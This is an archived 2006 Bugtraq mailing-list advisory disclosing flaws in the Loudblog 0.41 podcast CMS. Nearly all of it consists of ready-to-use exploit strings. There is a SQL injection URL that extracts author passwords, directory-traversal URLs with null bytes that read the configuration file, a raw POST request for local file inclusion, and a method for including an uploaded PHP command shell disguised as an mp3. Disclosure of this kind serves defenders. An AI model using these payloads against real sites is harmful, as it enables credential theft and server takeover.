lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 7 Mar 2006 17:33:57 -0000 From: tzitaroth@...il.com To: bugtraq@...urityfocus.com Subject: Loudblog 0.41 SQL Injection, Local file read/include "Loudblog is a sleek and easy-to-use Content Management System (CMS) for publishing media content on the web." SQL Injection in podcast.php (magic_quotes=off): http://[target]/loudblog/podcast.php?id=1' and '1'='0' union select password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from lb_authors where '1'='1' /* Read local files (index.php): http://[target]/loudblog/index.php?template=../../../loudblog/custom/config.php%00 Local php file include (loudblog/inc/backend_settings.php): POST /loudblog/loudblog/inc/backend_settings.php HTTP/1.1 Host: [target] Content-Type: application/x-www-form-urlencoded Content-Length: 23 language=../../../index Local file include (upload a cmdphp.mp3 comment, include it, must have access to admin panel): http://[target]/loudblog/loudblog/index.php?page=/../../../audio/cmdphp.mp3%00 ~kuze
Powered by blists - more mailing lists